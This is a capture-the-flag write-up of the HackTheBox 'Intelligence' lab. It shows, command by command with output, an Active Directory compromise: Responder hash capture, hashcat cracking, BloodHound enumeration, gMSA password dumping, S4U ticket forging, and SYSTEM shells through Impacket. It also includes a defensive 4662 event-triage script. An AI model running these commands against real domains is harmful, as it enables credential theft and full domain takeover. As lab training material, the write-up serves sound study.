DNS [ON]
DHCP [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.11]
Responder IPv6 [dead:beef:2::1009]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-FS1RHMHFQ6J]
Responder Domain Name [JAHG.LOCAL]
Responder DCE-RPC Port [47998]

[+] Listening for events...

[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:55d715a0f1b61eca:F1339196011CD69F875E8E722DA39D19:0101000000000000163AB6657E84DA01DF6CCD119A4C9F5B00000000020008004A0041004800470001001E00570049004E002D00460053003100520048004D0048004600510036004A00040014004A004100480047002E004C004F00430041004C0003003400570049004E002D00460053003100520048004D0048004600510036004A002E004A004100480047002E004C004F00430041004C00050014004A004100480047002E004C004F00430041004C00080030003000000000000000000000000020000042953171FBEFDE40C17FFC1A59EE6BBD28BDA280BDCCEB581936E5420526A2E70A001000000000000000000000000000000000000900400048005400540050002F007700650062002D00730068006900790061006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
[*] Skipping previously captured hash for intelligence\Ted.Graves

18. The NTLMv2 challenge-response of the account running the scheduled task (Ted.Graves) was captured. It is not a password and cannot be replayed, but it can be cracked offline; hashcat mode 5600 (NetNTLMv2) takes the Responder line as-is:

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "NTLMv2"
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash
Ted.Graves::intelligence:55d715a0f1b61eca:F1339196011CD69F875E8E722DA39D19:0101000000000000163AB6657E84DA01DF6CCD119A4C9F5B00000000020008004A0041004800470001001E00570049004E002D00460053003100520048004D0048004600510036004A00040014004A004100480047002E004C004F00430041004C0003003400570049004E002D00460053003100520048004D0048004600510036004A002E004A004100480047002E004C004F00430041004C00050014004A004100480047002E004C004F00430041004C00080030003000000000000000000000000020000042953171FBEFDE40C17FFC1A59EE6BBD28BDA280BDCCEB581936E5420526A2E70A001000000000000000000000000000000000000900400048005400540050002F007700650062002D00730068006900790061006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

TED.GRAVES::intelligence:55d715a0f1b61eca:f1339196011cd69f875e8e722da39d19:0101000000000000163ab6657e84da01df6ccd119a4c9f5b00000000020008004a0041004800470001001e00570049004e002d00460053003100520048004d0048004600510036004a00040014004a004100480047002e004c004f00430041004c0003003400570049004e002d00460053003100520048004d0048004600510036004a002e004a004100480047002e004c004f00430041004c00050014004a004100480047002e004c004f00430041004c00080030003000000000000000000000000020000042953171fbefde40c17ffc1a59ee6bbd28bda280bdcceb581936e5420526a2e70a001000000000000000000000000000000000000900400048005400540050002f007700650062002d00730068006900790061006e002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TED.GRAVES::intelligence:55d715a0f1b61eca:f13391960...000000
Time.Started.....: Mon Apr 1 22:51:54 2024 (8 secs)
Time.Estimated...: Mon Apr 1 22:52:02 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1433.4 kH/s (0.57ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10814464/14344385 (75.39%)
Rejected.........: 0/10814464 (0.00%)
Restore.Point....: 10813440/14344385 (75.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Ms.Jordan -> Mr.Brownstone
Hardware.Mon.#1..: Util: 84%

Started: Mon Apr 1 22:51:42 2024
Stopped: Mon Apr 1 22:52:03 2024

19. Verify the recovered credentials:

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.248 -u TED.GRAVES -p Mr.Teddy
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [+] intelligence.htb\TED.GRAVES:Mr.Teddy

20. Being a domain, getting a shell on the domain controller is not straightforward, but the credentials are enough for domain enumeration. Note the roughly 7-hour clock skew nmap reported: Kerberos rejects requests outside its 5-minute tolerance (KRB_AP_ERR_SKEW), so bloodhound-python falls back to NTLM below; any later Kerberos-only step (requesting tickets) needs the local clock synced to the DC, for example with ntpdate or by running the tool under faketime:

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -ns 10.10.10.248 -d intelligence.htb -dc dc.intelligence.htb -u Ted.Graves -p Mr.Teddy
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 48S

21. Start the neo4j database, then upload the collected data for analysis:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:53161). It is available at http://localhost:7474
There may be a short delay until the server is ready.

Upload the collected JSON files into BloodHound.

In BloodHound, mark the users Tiffany.Molina and Ted.Graves as owned, and mark svc_int and Administrator as high-value targets.

22. Work out the attack path. BloodHound shows a ReadGMSAPassword edge from the ITSUPPORT group to SVC_INT$, and its help text explains the abuse:

SVC_INT$@INTELLIGENCE.HTB is a Group Managed Service Account. The group ITSUPPORT@INTELLIGENCE.HTB can retrieve the password for the GMSA SVC_INT$@INTELLIGENCE.HTB.

Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is managed by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).

The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

There are several ways to abuse the ability to read the GMSA password. The most straightforward abuse is possible when the GMSA is currently logged on to a computer, which is the intended behavior for a GMSA. If the GMSA is logged on to the computer account which is granted the ability to retrieve the GMSA's password, simply steal the token from the process running as the GMSA, or inject into that process.

If the GMSA is not logged onto the computer, you may create a scheduled task or service set to run as the GMSA. The computer account will start the scheduled task or service as the GMSA, and then you may abuse the GMSA logon in the same fashion you would a standard user running processes on the machine (see the "HasSession" help modal for more details).

Finally, it is possible to remotely retrieve the password for the GMSA and convert that password to its equivalent NT hash. gMSADumper.py can be used for that purpose.

gMSADumper.py -u 'user' -p 'password' -d 'domain.local'

At this point you are ready to use the NT hash the same way you would with a regular user account. You can perform pass-the-hash, overpass-the-hash, or any other technique that takes an NT hash as an input.

When abusing a GMSA that is already logged onto a system, you will have the same opsec considerations as when abusing a standard user logon. For more information about that, see the "HasSession" modal's opsec considerations tab.

When retrieving the GMSA password from Active Directory, you may generate a 4662 event on the Domain Controller; however, that event will likely perfectly resemble a legitimate event if you request the password from the same context as a computer account that is already authorized to read the GMSA password.

https://github.com/micahvandeusen/gMSADumper
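The 4662 caveat in the BloodHound text above is the part a defender can act on: the event looks legitimate when the authorized computer account (here DC$) requests the password, so triage has to key on who the subject is rather than on the event alone. The following is an added example (not from the original write-up, BloodHound or gMSADumper) that triages constructed 4662 events against the svc_int$ reader list gMSADumper reports later in this write-up; the attribute GUID and the sample DN are assumptions to verify in your own forest.

```python
"""Triage Windows Security event 4662 for reads of a gMSA's msDS-ManagedPassword.
Added example (not from the original write-up, BloodHound or gMSADumper); events are constructed."""

# schemaIDGUID of msDS-ManagedPassword. Assumed value: confirm it against your own forest's schema.
MANAGED_PASSWORD_GUID = "e362ed86-b728-0842-b27d-2dea7a9df218"
# Principals expected to read the blob (PrincipalsAllowedToRetrieveManagedPassword). gMSADumper
# lists DC$ and the itsupport group for svc_int$; a group is never a 4662 subject, so list members.
AUTHORIZED_READERS = {"DC$"}
ADS_RIGHT_DS_READ_PROP = 0x10  # AccessMask bit for "Read Property"

def is_gmsa_password_read(event):
    """True when a 4662 touched msDS-ManagedPassword with Read Property access."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    mask = int(event.get("AccessMask", "0x0"), 16)
    return MANAGED_PASSWORD_GUID in props and (mask & ADS_RIGHT_DS_READ_PROP) != 0

def triage(events):
    """Return (subject, object) pairs for managed-password reads by a non-authorized subject.
    Reads by DC$ are skipped: as the BloodHound text notes, those look exactly like the
    DC's own legitimate access, so the subject is the only useful discriminator."""
    hits = []
    for ev in events:
        if not is_gmsa_password_read(ev):
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() not in AUTHORIZED_READERS:
            hits.append((subject, ev.get("ObjectName", "")))
    return hits

# Constructed sample events; field names follow the 4662 event XML (SubjectUserName, ObjectName,
# Properties, AccessMask). The DN is a plausible default location, not taken from the box.
GMSA_DN = "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb"
PW_PROP = "{" + MANAGED_PASSWORD_GUID + "}"
OTHER_PROP = "{00000000-0000-0000-0000-000000000000}"  # placeholder GUID for some other attribute
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectName": GMSA_DN,
     "Properties": PW_PROP, "AccessMask": "0x10"},         # the DC reading it: expected
    {"EventID": 4662, "SubjectUserName": "Ted.Graves", "ObjectName": GMSA_DN,
     "Properties": PW_PROP, "AccessMask": "0x10"},         # a user account reading it: alert
    {"EventID": 4662, "SubjectUserName": "Ted.Graves", "ObjectName": GMSA_DN,
     "Properties": OTHER_PROP, "AccessMask": "0x10"},      # different attribute: ignore
    {"EventID": 4624, "SubjectUserName": "Ted.Graves"},     # not a 4662 at all
]

if __name__ == "__main__":
    for subject, obj in triage(SAMPLE_EVENTS):
        print(f"ALERT: gMSA password read by {subject} on {obj}")
```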

23. In other words, the ability to read the GMSA password can be abused here. First, use this tool to retrieve the password hashes.

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ python3 gMSADumper.py -u 'TED.GRAVES' -p 'Mr.Teddy' -d 'intelligence.htb'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::486b1ed2229329984333a964b71045e9
svc_int$:aes256-cts-hmac-sha1-96:0d542d3dac3287785fe6d87d4e242bfcbcd3bf999541f31cd1b058e42ed2992a
svc_int$:aes128-cts-hmac-sha1-96:e85b1861ce4c561627b9532b64d86460

24. Next, use this service account to build a ticket and log in to the server. First synchronize the clock with the domain controller so the ticket can be built. To sync time with the target host, we first disable automatic time synchronization by running timedatectl set-ntp 0. After that, we can run sudo ntpdate -s intelligence.htb to start the synchronization.

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ sudo timedatectl set-ntp 0

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ date && sudo ntpdate -s intelligence.htb && date
20240401日 星期一 23:23:59 CST
20240402日 星期二 06:23:59 CST

25. Generate the ticket file

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :486b1ed2229329984333a964b71045e9
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ ls
Administrator.ccache COPYING gMSADumper.py __init__.py README.md requirements.txt

26. To get a shell, I will use wmiexec (shipped with Impacket). -k specifies Kerberos authentication. I will set the KRB5CCNAME environment variable to point at the ticket file I want to use.

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ KRB5CCNAME=Administrator.ccache impacket-wmiexec -k -no-pass administrator@dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator

27. We can see this is the Administrator account, so let's continue with impacket-psexec to obtain SYSTEM privileges and read the flag.

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file SOMzpjgG.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service ancH on dc.intelligence.htb.....
[*] Starting service ancH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:/Users/Administrator/Desktop

C:\Users\Administrator\Desktop> type root.txt
44f316f48f6250723dfd91afb7dcfabb

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/357


Intelligence-htb-writeup
https://sh1yan.top/2024/03/31/Intelligence-htb-writeup/
Author
shiyan
Published on
March 31, 2024
License